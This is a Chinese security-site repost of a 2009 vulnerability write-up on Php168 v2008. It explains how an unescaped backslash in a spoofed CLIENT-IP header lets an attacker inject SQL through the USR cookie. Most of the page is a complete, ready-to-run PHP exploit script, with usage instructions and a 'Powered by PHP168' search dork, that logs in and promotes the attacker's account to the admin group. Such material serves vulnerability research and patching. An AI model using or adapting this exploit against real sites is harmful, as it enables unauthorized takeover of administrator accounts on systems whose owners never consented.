首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Php168 v2008 权限提升漏洞
来源:http://www.wolvez.org 作者:Ryat 发布时间:2009-02-02  

by Ryat
http://www.wolvez.org
2009-01-25

简单分析下这个漏洞

PHP代码
common.inc.php   
  
if($_SERVER['HTTP_CLIENT_IP']){   
     $onlineip=$_SERVER['HTTP_CLIENT_IP'];   
}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){   
     $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];   
}else{   
     $onlineip=$_SERVER['REMOTE_ADDR'];   
}   
$onlineip = preg_replace("/^([\d\.]+).*/", "\\1", filtrate($onlineip));   
//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip  
看一下filtrate函数是怎么处理的

PHP代码
function.inc.php   
  
function filtrate($msg){   
    $msg = str_replace('&','&',$msg);   
    $msg = str_replace(' ',' ',$msg);   
    $msg = str_replace('"','"',$msg);   
    $msg = str_replace("'",''',$msg);   
    $msg = str_replace("<","<",$msg);  
    $msg = str_replace(">",">",$msg);  
    $msg = str_replace("\t","       ",$msg);  
    $msg = str_replace("\r","",$msg);  
    $msg = str_replace("   ","   ",$msg);   
    return $msg;   
}  
过滤了'"<等,但是没有处理\

PHP代码
common.inc.php   
  
    if($usr_oltime>30||!$usr_oltime){   
        $usr_oltime>600 && $usr_oltime=600;   
        include(PHP168_PATH."php168/level.php");   
        if( isset($memberlevel[$lfjdb[groupid]]) ){   
            $SQL=",groupid=8";   
            $lfjdb[money]=get_money($lfjuid);   
            foreach( $memberlevel AS $key=>$value){   
                if($lfjdb[money]>=$value){   
                    $SQL=",groupid=$key";   
                }   
            }   
        }else{   
            $SQL="";   
        }   
        $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime+'$usr_oltime'$SQL WHERE uid='$lfjuid'");   
//因为这个地方是拼接字符串的形式,所以可以使用\来转义',然后利用$usr_oltime来注射:)  
另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:

PHP代码
UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime+'[+31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid'  
最后给个EXP:

PHP代码
#!/usr/bin/php   
<?php   
  
print_r('  
+---------------------------------------------------------------------------+  
Php168 <= v2008 update user access exploit  
by puret_t  
mail: puretot at gmail dot com  
team: http://www.wolvez.org  
dork: "Powered by PHP168"  
+---------------------------------------------------------------------------+  
');   
/**  
 * works regardless of php.ini settings  
 */  
if ($argc < 5) {   
    print_r('  
+---------------------------------------------------------------------------+  
Usage: php '.$argv[0].' host path user pass  
host:      target server (ip/hostname)  
path:      path to php168  
user:      login username  
pass:      login password  
Example:  
php '.$argv[0].' localhost /php168/  
+---------------------------------------------------------------------------+  
');   
    exit;   
}   
  
error_reporting(7);   
ini_set('max_execution_time', 0);   
  
$host = $argv[1];   
$path = $argv[2];   
$user = $argv[3];   
$pass = $argv[4];   
  
$resp = send();   
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);   
  
if ($cookie)   
    if (strpos(send(), 'puret_t') !== false)   
        exit("Expoilt Success!\nYou Are Admin Now!\n");   
    else  
        exit("Exploit Failed!\n");   
else  
    exit("Exploit Failed!\n");   
  
function rands($length = 8)   
{   
    $hash = '';   
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';   
    $max = strlen($chars) - 1;   
    mt_srand((double)microtime() * 1000000);   
    for ($i = 0; $i < $length; $i++)   
        $hash .= $chars[mt_rand(0, $max)];   
  
    return $hash;   
}   
  
function send()   
{   
    global $host, $path, $user, $pass, $cookie;   
  
    if ($cookie) {   
        $cookie[1] .= ';USR='.rands()."\t%2b31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";   
        $cmd = '';   
  
        $message = "POST ".$path."member/userinfo.php  HTTP/1.1\r\n";   
        $message .= "Accept: */*\r\n";   
        $message .= "Accept-Language: zh-cn\r\n";   
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";   
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";   
        $message .= "CLIENT-IP: ryat\\\r\n";   
        $message .= "Host: $host\r\n";   
        $message .= "Content-Length: ".strlen($cmd)."\r\n";   
        $message .= "Connection: Close\r\n";   
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";   
        $message .= $cmd;   
    } else {   
        $cmd = "username=$user&password=$pass&step=2";   
  
        $message = "POST ".$path."login.php  HTTP/1.1\r\n";   
        $message .= "Accept: */*\r\n";   
        $message .= "Accept-Language: zh-cn\r\n";   
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";   
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";   
        $message .= "Host: $host\r\n";   
        $message .= "Content-Length: ".strlen($cmd)."\r\n";   
        $message .= "Connection: Close\r\n\r\n";   
        $message .= $cmd;   
    }   
  
    $fp = fsockopen($host, 80);   
    fputs($fp, $message);   
  
    $resp = '';   
  
    while ($fp && !feof($fp))   
        $resp .= fread($fp, 1024);   
  
    return $resp;   
}   
  
?>  


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS09-001 SMB Dos Poc Exploit
·Jieqi cms v1.5 remote code exe
·Small HTTP Server <= 3.05.85 D
·Google Chrome 1.0.154.46 (Chro
·Flatnux 2009-01-27 (Job fields
·Spider Player 2.3.9.5 (asx Fil
·Elecard AVC HD PLAYER (m3u/xpl
·eVision CMS <= 2.0 (field) SQL
·RealVNC 4.1.2 (vncviewer.exe)
·SkaLinks 1.5 (Auth Bypass) SQL
·phpBLASTER 1.0 RC1 (blaster_us
·Orca 2.0.2 (Topic) Remote XSS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved